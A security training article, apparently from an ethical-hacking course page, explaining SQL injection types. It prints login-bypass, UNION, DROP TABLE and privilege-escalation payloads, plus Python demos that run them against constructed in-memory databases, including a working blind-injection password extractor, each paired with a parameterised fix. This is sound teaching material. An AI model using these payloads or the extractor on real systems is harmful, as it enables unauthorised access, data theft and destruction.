CEH Module 15: SQL Injection
Have you ever wondered how cybercriminals gain control of a website or steal sensitive information? One common and devastating technique they use is called SQL injection. In “CEH Module 15: SQL Injection,” we will explore this powerful attack method. We’ll break down the concepts of SQL injection, demonstrate various types of attacks, and explain the methodologies used by attackers.
What is SQL Injection?
Have you ever entered your information on a website and wondered how safe it is? SQL injection is one of the sneaky tricks cybercriminals use to break into websites and steal data. But what exactly is SQL injection?
Imagine a website with a search box where you type in what you’re looking for. Normally, the website takes what you typed and checks its database for matching information. But if the website isn’t properly protected, a hacker can type in special commands instead of a regular search term. These commands trick the website into giving the hacker access to its database. The attacker can see, steal, or even change the stored data. Scary, right?
SQL injection is a method that takes advantage of a website’s weak points, specifically the parts where the site doesn’t properly check or clean up what users type in. This flaw isn’t in the database or the web server but in how the website handles user input.
Why is SQL Injection Dangerous?
SQL injection can lead to several serious issues, including:
- Authentication and Authorization Bypass: Hackers can log in without a valid username and password, gaining administrative access.
- Information Disclosure: Attackers can retrieve sensitive information stored in the database, such as personal details and financial data.
- Compromised Data Integrity: Hackers can modify or delete data, deface websites or alter important records.
- Compromised Availability of Data: Attackers can delete or drop tables so that legitimate users and applications lose access to their data, and can delete logs or audit information to make their activity hard to trace.
- Remote Code Execution: On some database servers the injected SQL can reach operating-system commands (for example, the xp_cmdshell extended stored procedure on Microsoft SQL Server when it is enabled), letting the attacker run code on the server and potentially compromise the entire system.
How Does SQL Injection Work?
Structured Query Language (SQL) is a special language used to communicate with databases. It includes commands like INSERT, SELECT, UPDATE, and DELETE, which are used to add, retrieve, modify, and remove data in the database.
Here’s how an SQL injection attack typically works:
- A hacker finds a web application that uses SQL to interact with its database.
- The hacker identifies an input field, like a search box or login form, where they can enter data.
- Instead of typing normal input, the hacker enters a malicious SQL query.
- If the application does not properly check or clean this input, it executes the malicious SQL query.
For example, if the login page builds its query by concatenating the submitted values, such as SELECT * FROM users WHERE username = '<username>' AND password = '<password>', the attacker might enter:
Username: ' OR 1=1 --
Password: anything
The resulting query becomes SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'anything'. The condition 1=1 is always true, so the WHERE clause matches every user, and the -- comment discards the rest of the statement, including the password check. The application sees a matching row and logs the attacker in, usually as the first user in the table.
Examples of SQL Injection Attacks
All four examples below rely on stacked queries: the attacker closes the original statement with a semicolon, appends a statement of their own, and comments out whatever the application would have added after the input. Whether this works depends on the database and the driver; Microsoft SQL Server accepts batches of statements, while many MySQL and PHP configurations execute only one statement per call.
Updating Table: An attacker can change the email address associated with an account by injecting an UPDATE statement.
Attacker SQL Query: blah'; UPDATE jk-customers SET jk-email = 'info@infosectrain.com' WHERE jk-email = 'jack@springfield.com'; --
Adding New Records: Attackers can insert new records, such as an account they control, into a database.
Attacker SQL Query: blah'; INSERT INTO jk-customers ('jk-email','jk-passwd','jk-login_id','jk-last_name') VALUES ('jack@springfield.com','hello','jack','jack springfield'); --
Identifying the Table Name: Attackers can guess table names; a subquery against a table that exists behaves normally, while one against a table that does not exist produces an error, so the response reveals whether the guess was right.
Attacker SQL Query: blah' AND 1=(SELECT COUNT(*) FROM mytable); --
Deleting a Table: Attackers can drop entire tables from the database.
Attacker SQL Query: blah'; DROP TABLE Creditcard; --
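The following added example (not code from the original page) runs the UPDATE, INSERT and DROP TABLE payloads above against a small application lookup and shows the point practitioners care about: a stacked query only does damage when the application's database call accepts more than one statement. The customers and creditcard tables, the sample rows and the attacker's e-mail addresses are constructed for illustration; Python's sqlite3.execute() stands in for a one-statement-per-call API, and executescript() for a batch-capable API such as SQL Server's.

```python
"""Stacked-query injection (the UPDATE / INSERT / DROP TABLE payloads above)
and why its success depends on how the application talks to the database.

Added example, not code from the original page. The customers/creditcard
schema and the sample rows are constructed; sqlite3's execute() stands in
for a one-statement-per-call API and executescript() for a batch API such
as SQL Server's, which runs every statement it is given.
"""
import sqlite3


def build_db():
    """Constructed sample data: the two tables the payloads target."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers (login_id TEXT, email TEXT, passwd TEXT);
        INSERT INTO customers VALUES ('jack', 'jack@springfield.com', 'secret');
        CREATE TABLE creditcard (number TEXT);
        INSERT INTO creditcard VALUES ('4111111111111111');
    """)
    return conn


# The application's lookup, with the user's input glued into the SQL text.
TEMPLATE = "SELECT login_id FROM customers WHERE email = '%s'"

# The page's three payloads, adapted to the constructed table names.
PAYLOAD_UPDATE = ("blah'; UPDATE customers SET email = 'attacker@example.test' "
                  "WHERE email = 'jack@springfield.com'; --")
PAYLOAD_INSERT = ("blah'; INSERT INTO customers (email, passwd, login_id) "
                  "VALUES ('mallory@example.test', 'hello', 'mallory'); --")
PAYLOAD_DROP = "blah'; DROP TABLE creditcard; --"


def lookup_one_statement(conn, email):
    """One statement per call: the driver refuses the batch, so nothing after
    the first SELECT can run. Returns 'blocked' when that happens."""
    try:
        conn.execute(TEMPLATE % email).fetchall()
        return "executed"
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        # sqlite3: "You can only execute one statement at a time."
        return "blocked"


def lookup_batch(conn, email):
    """Batch-capable call: the SELECT runs, then every statement the attacker
    appended after the ';' runs with the application's database privileges."""
    conn.executescript(TEMPLATE % email)
    return "executed"


def lookup_parameterised(conn, email):
    """The fix: the value is bound, never parsed as SQL, so the whole payload
    is just an e-mail address that matches nothing."""
    return conn.execute(
        "SELECT login_id FROM customers WHERE email = ?", (email,)).fetchall()


def email_of(conn, login_id):
    row = conn.execute("SELECT email FROM customers WHERE login_id = ?",
                       (login_id,)).fetchone()
    return row[0] if row else None


def table_exists(conn, name):
    return conn.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                        (name,)).fetchone() is not None


def demo():
    """Runs each payload through the three code paths and reports the damage."""
    one, batch, fixed = build_db(), build_db(), build_db()
    results = {
        "one_statement": lookup_one_statement(one, PAYLOAD_DROP),
        "one_statement_table_kept": table_exists(one, "creditcard"),
    }
    for payload in (PAYLOAD_UPDATE, PAYLOAD_INSERT, PAYLOAD_DROP):
        lookup_batch(batch, payload)
        lookup_parameterised(fixed, payload)
    results.update({
        "batch_jack_email": email_of(batch, "jack"),
        "batch_mallory_email": email_of(batch, "mallory"),
        "batch_table_kept": table_exists(batch, "creditcard"),
        "fixed_jack_email": email_of(fixed, "jack"),
        "fixed_table_kept": table_exists(fixed, "creditcard"),
    })
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:26} {value!r}")
```

The one-statement path is a property of the driver, not a defence: a different endpoint, a different driver setting, or a different DBMS behind the same code turns "blocked" into "executed". Only the parameterised lookup is safe regardless of the API.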
Types of SQL Injection
In-Band SQL Injection
In in-band SQL injection, the attacker uses the same communication channel, normally the HTTP request and response, both to deliver the attack and to read back its results. Several in-band techniques exist; the most commonly used are error-based SQL injection and UNION-based SQL injection.
- Error-Based SQL Injection: An attacker deliberately sends malformed input to make the database raise errors. When the application returns those error messages verbatim, they confirm that a parameter is injectable and often leak the DBMS type, the structure of the query, and sometimes data. The stored-procedure, illegal-query, tautology and comment techniques described next are the usual ways of provoking and exploiting such errors.
- System Stored Procedure: Stored procedures do not by themselves prevent injection. If a procedure builds its SQL dynamically from its arguments, and the web application passes unsanitized user input as those arguments, the attacker's input is still concatenated into SQL and executed. Example (Microsoft SQL Server):
CREATE PROCEDURE Login @user_name varchar(20), @password varchar(20)
AS
DECLARE @query varchar(250)
SET @query = 'SELECT 1 FROM usertable WHERE username = ''' + @user_name + ''' AND password = ''' + @password + ''''
EXEC(@query)
GO
If the attacker enters the following values in the application's login fields while this procedure runs in the backend, the dynamically built query becomes SELECT 1 FROM usertable WHERE username = 'anyusername' OR 1=1 --' AND password = 'anypassword', and the procedure returns 1 for any password:
Username: anyusername' OR 1=1 --
Password: anypassword
- Illegal/Logically Incorrect Query: An attacker intentionally sends a syntactically or logically incorrect query so that the database returns an error message, and uses what that message reveals (injectable parameters, column data types, table and column names) to plan further attacks and map the structure of the underlying database. Example: the attacker submits the username joy' (with a trailing single quote), which turns the application's query into:
SELECT * FROM Users WHERE UserName = 'joy'' AND password = 'xxx'
After executing the above query, the database may return the following error message, which tells the attacker both that the username field is injectable and what the rest of the query looks like:
Incorrect syntax near 'joy'. Unclosed quotation mark after the character string '' AND Password='xxx''.
- UNION SQL Injection: The UNION operator appends the result set of a second SELECT to that of the first, so the injected SELECT must return the same number of columns as the original query, with compatible types. In a UNION SQL injection, the attacker appends a SELECT on a table of their choosing to the application's query, and the stolen rows come back in the normal result page, as in the following example:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
The attacker first tests for the vulnerability by appending a single quote (') to a parameter, for example the id in a URL such as page.php?id=1. A database error in the response shows that the parameter is injectable and usually reveals which DBMS is in use. The attacker then determines the number of columns in the original query (for instance by increasing n in ORDER BY n, or adding NULLs to UNION SELECT NULL,NULL,... until the error disappears) before building the final UNION payload.
- Tautology: In a tautology-based SQL injection attack, an attacker uses an OR clause whose second operand is always true, so the whole WHERE condition is always true. Such an attack can be used to bypass user authentication. Example:
SELECT * FROM users WHERE name = '' OR '1'='1';
Because '1'='1' always holds, the WHERE clause matches every row in users. An application that treats "at least one row returned" as a successful login is bypassed, and typically logs the attacker in as the first user in the table.
- End-of-Line Comment: In this type of SQL injection, an attacker ends their input with a line comment. Comments in SQL are usually introduced by -- (MySQL additionally accepts #, and requires a space after --), and everything after the comment marker up to the end of the line is ignored by the parser. The database therefore executes the statement up to the comment and discards the rest of the query, including any checks the application appended after the injected value. Example:
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
With this query, an attacker can log in to the admin account without the password, because the password comparison is inside the comment that begins immediately after username = 'admin'.
- In-line Comments: Attackers use block comments (/* ... */) to join several vulnerable inputs into a single query, to remove spaces, to obfuscate payloads past blacklists, and, in MySQL, to fingerprint the version via /*!50000 ... */ conditional comments. Example: the following PHP builds the registration query dynamically from a new user's username and password, hard-coding isAdmin to 0:
INSERT INTO Users (UserName, isAdmin, Password) VALUES ('" . $username . "', 0, '" . $password . "')
The attacker supplies the following two inputs:
UserName: Attacker', 1, /*
Password: */'mypwd
The generated query is then:
INSERT INTO Users (UserName, isAdmin, Password) VALUES('Attacker', 1, /*', 0, '*/'mypwd')
The hard-coded 0 for isAdmin now sits inside the comment, so the new account is created with isAdmin = 1 and the attacker obtains administrator privileges.
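The added example below (not code from the original page) runs the in-band payloads from this section against a small application: the tautology and end-of-line-comment login bypass, which is also the ' OR 1=1 -- login example from earlier in the article, the UNION extraction of card numbers, and the in-line-comment INSERT that sets isAdmin. Each vulnerable function is paired with its parameterised fix so the same payloads can be seen failing. The members, items and creditcardtable tables and their rows are constructed for illustration; passwords are stored in clear only to keep the demo short.

```python
"""In-band SQL injection against code that concatenates input into SQL:
tautology / end-of-line-comment login bypass, UNION data extraction, and
the in-line-comment INSERT that grants admin rights.

Added example, not code from the original page. The schema, rows and
table names (members, items, creditcardtable) are constructed.
"""
import sqlite3


def build_db():
    """Constructed in-memory data for the three attacks below."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE members (username TEXT, password TEXT, isadmin INTEGER);
        INSERT INTO members VALUES ('admin', 'c0rrect-h0rse', 1);
        INSERT INTO members VALUES ('alice', 'alice-pw', 0);
        CREATE TABLE items (id INTEGER, name TEXT, phone TEXT, address TEXT);
        INSERT INTO items VALUES (1, 'Widget', '555-0100', '1 Main St');
        CREATE TABLE creditcardtable (creditcardnumber TEXT);
        INSERT INTO creditcardtable VALUES ('4111111111111111');
    """)
    return conn


# ---- vulnerable code: string formatting builds the SQL -----------------------

def vulnerable_login(conn, username, password):
    """Returns the matched username or None. The WHERE clause is whatever the
    attacker makes it: ' OR 1=1 --  (tautology) or admin'--  (EOL comment)."""
    sql = ("SELECT username FROM members WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def vulnerable_item(conn, item_id):
    """Three-column SELECT; a UNION payload with three columns appends rows."""
    sql = "SELECT name, phone, address FROM items WHERE id=%s" % item_id
    return conn.execute(sql).fetchall()


def vulnerable_register(conn, username, password):
    """isadmin is hard-coded to 0, but /* */ lets the attacker comment it out."""
    sql = ("INSERT INTO members (username, isadmin, password) VALUES ('%s', 0, '%s')"
           % (username, password))
    conn.execute(sql)
    conn.commit()


# ---- fixed code: bound parameters, input is data and never SQL ---------------

def safe_login(conn, username, password):
    row = conn.execute(
        "SELECT username FROM members WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def safe_item(conn, item_id):
    return conn.execute(
        "SELECT name, phone, address FROM items WHERE id = ?", (item_id,)).fetchall()


def safe_register(conn, username, password):
    conn.execute("INSERT INTO members (username, isadmin, password) VALUES (?, 0, ?)",
                 (username, password))
    conn.commit()


def is_admin(conn, username):
    row = conn.execute("SELECT isadmin FROM members WHERE username = ?",
                       (username,)).fetchone()
    return bool(row and row[0])


# The page's payloads.
TAUTOLOGY = "' OR 1=1 --"
EOL_COMMENT = "admin'--"
UNION = "1 UNION ALL SELECT creditcardnumber,1,1 FROM creditcardtable"
INLINE_USER, INLINE_PASS = "Attacker', 1, /*", "*/'mypwd"


def demo():
    """Runs every payload against both code paths and reports the outcome."""
    vuln, safe = build_db(), build_db()
    vulnerable_register(vuln, INLINE_USER, INLINE_PASS)   # creates Attacker, isadmin=1
    safe_register(safe, INLINE_USER, INLINE_PASS)         # creates a literal odd username
    return {
        "vuln_tautology": vulnerable_login(vuln, TAUTOLOGY, "anything"),
        "vuln_eol_comment": vulnerable_login(vuln, EOL_COMMENT, "wrong"),
        "vuln_union": vulnerable_item(vuln, UNION),
        "vuln_inline_admin": is_admin(vuln, "Attacker"),
        "safe_tautology": safe_login(safe, TAUTOLOGY, "anything"),
        "safe_eol_comment": safe_login(safe, EOL_COMMENT, "wrong"),
        "safe_union": safe_item(safe, UNION),
        "safe_inline_admin": is_admin(safe, INLINE_USER),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18} -> {value!r}")
```

Note that the UNION row arrives in the same result list as the legitimate item, which is exactly what "in-band" means, and that the fixed register() still creates an account whose username is the raw payload string: parameterisation keeps input out of the SQL parser, but input validation remains the application's job.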
Blind/Inferential SQL Injection
In blind SQL injection, the attacker's queries still execute, but the application never shows their output or any database error. Instead, the attacker infers the result from the application's behaviour, such as which page comes back or how long the response takes. Because each request leaks at most a bit or two of information, the attack is slower and needs many more requests than in-band injection, but it is just as effective and is routinely automated.
- Boolean Exploitation: In Boolean-based blind SQL injection, the attacker appends a condition to the query so that the application returns one page when the condition is true and a different page when it is false. By submitting a series of conditions in the affected parameter of the HTTP request and comparing the responses, the attacker infers both whether the injection works and, one condition at a time, the contents of the database. Example:
URL: http://www.myshop.com/item.aspx?id=67
SQL query: SELECT Name, Price, Description FROM ITEM_DATA WHERE ITEM_ID = 67
Manipulated URL: http://www.myshop.com/item.aspx?id=67 and 1=2
Query after manipulation: SELECT Name, Price, Description FROM ITEM_DATA WHERE ITEM_ID = 67 AND 1 = 2
The "and 1=2" request returns no item. If the matching "and 1=1" request returns the normal item page, the parameter is injectable, and the attacker can replace 1=2 with any condition (for example, a comparison on one character of a password column) and read the answer from which page comes back.
- Heavy Query: Attackers use heavy queries to perform a time-based blind SQL injection without calling a delay function such as SLEEP() or WAITFOR DELAY, which filters may block. A heavy query is one that takes a long time to execute, typically a subquery that cross-joins system tables several times, so the response time tells the attacker whether the condition in front of it was evaluated. Example (Oracle, where all_users is a data-dictionary view and the three-way join makes the cost grow with the cube of its row count):
SELECT * FROM products WHERE id=1 AND 1 < (SELECT count(*) FROM all_users A, all_users B, all_users C)
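The added example below (not code from the original page) carries the Boolean-based attack above through to data extraction: the endpoint only ever says whether item 67 was found, yet an attacker can read the admin password out of it character by character, first by probing the string's length and then by binary-searching each character's code. The shop schema, the admin row and the item id are constructed; SQLite's length(), substr() and unicode() stand in for the equivalents on other engines (for example SUBSTRING/ASCII on SQL Server, SUBSTR/ASCII on MySQL and Oracle). The same extractor is run against a parameterised version of the endpoint to show that it then learns nothing.

```python
"""Boolean-based blind SQL injection: the page never echoes database output,
only 'found' / 'not found', yet one bit per request is enough to read
arbitrary values out of the database.

Added example, not code from the original page. Schema, rows and the item
id 67 are constructed; SQLite's length()/substr()/unicode() stand in for
the equivalent functions on other engines.
"""
import sqlite3


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE item_data (item_id INTEGER, name TEXT, price REAL, description TEXT);
        INSERT INTO item_data VALUES (67, 'Widget', 9.99, 'A widget');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret!Pa55');
    """)
    return conn


def vulnerable_page(conn, item_id_param):
    """item.aspx?id=<param>: renders the item (True) or 'not found' (False).
    No column value is ever shown, so the attacker must infer."""
    sql = "SELECT name, price, description FROM item_data WHERE item_id = %s" % item_id_param
    return conn.execute(sql).fetchone() is not None


def safe_page(conn, item_id_param):
    """Same endpoint, parameterised: the payload is compared as one literal."""
    sql = "SELECT name, price, description FROM item_data WHERE item_id = ?"
    return conn.execute(sql, (item_id_param,)).fetchone() is not None


class BlindExtractor:
    """Turns the true/false page into an oracle and reads a string through it."""

    def __init__(self, conn, page, base_id=67):
        self.conn, self.page, self.base_id = conn, page, base_id
        self.requests = 0  # how many HTTP requests the attack would cost

    def ask(self, condition):
        # id=67 AND (condition): the item renders only when the condition holds
        self.requests += 1
        return self.page(self.conn, "%d AND (%s)" % (self.base_id, condition))

    def is_injectable(self):
        # The classic probe from the page: 'and 1=1' and 'and 1=2' must differ.
        return self.ask("1=1") and not self.ask("1=2")

    def extract(self, subquery, max_len=64):
        # 1. Length of the target string, by counting upwards.
        length = 0
        while length < max_len and self.ask("length((%s)) > %d" % (subquery, length)):
            length += 1
        # 2. Each character, by binary search over printable ASCII 32..126:
        #    about seven requests per character instead of up to 95.
        out = []
        for pos in range(1, length + 1):
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                if self.ask("unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                    lo = mid + 1
                else:
                    hi = mid
            out.append(chr(lo))
        return "".join(out)


ADMIN_PW = "(SELECT password FROM users WHERE username = 'admin')"


def demo():
    conn = build_db()
    vuln = BlindExtractor(conn, vulnerable_page)
    safe = BlindExtractor(conn, safe_page)
    return {
        "vuln_injectable": vuln.is_injectable(),
        "vuln_password": vuln.extract(ADMIN_PW),
        "vuln_requests": vuln.requests,
        "safe_injectable": safe.is_injectable(),
        "safe_password": safe.extract(ADMIN_PW),
    }


if __name__ == "__main__":
    print(demo())
```

The request counter is the detection angle: a single client issuing dozens of requests for the same item id with slightly different query strings is the signature that web-server logs and WAF rules look for.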
Out-of-Band SQL Injection
Out-of-band SQL injection is less common and uses a different channel to carry the results than the one used to deliver the attack. It applies when the database server can open network connections of its own, typically DNS or HTTP, to a server controlled by the attacker, and is useful when the application shows neither output nor errors and is too unstable for inference. For example, in Microsoft SQL Server an attacker can call the xp_dirtree extended stored procedure with a UNC path under an attacker-controlled domain, which makes the database server resolve that hostname and so deliver a DNS request (with data embedded in the name) to the attacker's name server. Similarly, in Oracle Database an attacker may use the UTL_HTTP package to send HTTP requests from SQL or PL/SQL to the attacker's server, with the extracted data in the URL.
Master CEH with InfosecTrain
SQL injection is one of the most powerful and dangerous hacking techniques, giving cybercriminals a direct path to exploit databases and steal sensitive information. If you understand how these attacks work and the different ways they can be executed, you will be in a much stronger position to secure web applications and stop attackers before they strike. Mastering SQL injection defense is not just about knowledge; it is about staying ahead of the game. InfosecTrain's Certified Ethical Hacker (CEH) course provides in-depth knowledge and hands-on experience to help you master SQL injection techniques and countermeasures, preparing you to defend against these threats.
Take your ethical hacking skills to the next level with InfosecTrain’s CEH training! Gain expertise in SQL injection and other critical security topics. Enroll now and become a Certified Ethical Hacker today!
TRAINING CALENDAR of Upcoming Batches For CEH v13
Start Date | End Date | Start - End Time | Batch Type | Training Mode | Batch Status
---|---|---|---|---|---
24-Feb-2025 | 27-Mar-2025 | 20:00 - 22:00 IST | Weekday | Online | Closed
02-Mar-2025 | 12-Apr-2025 | 19:00 - 23:00 IST | Weekend | Online | Open
23-Mar-2025 | 03-May-2025 | 09:00 - 13:00 IST | Weekend | Online | Open
06-Apr-2025 | 24-May-2025 | 09:00 - 13:00 IST | Weekend | Online | Open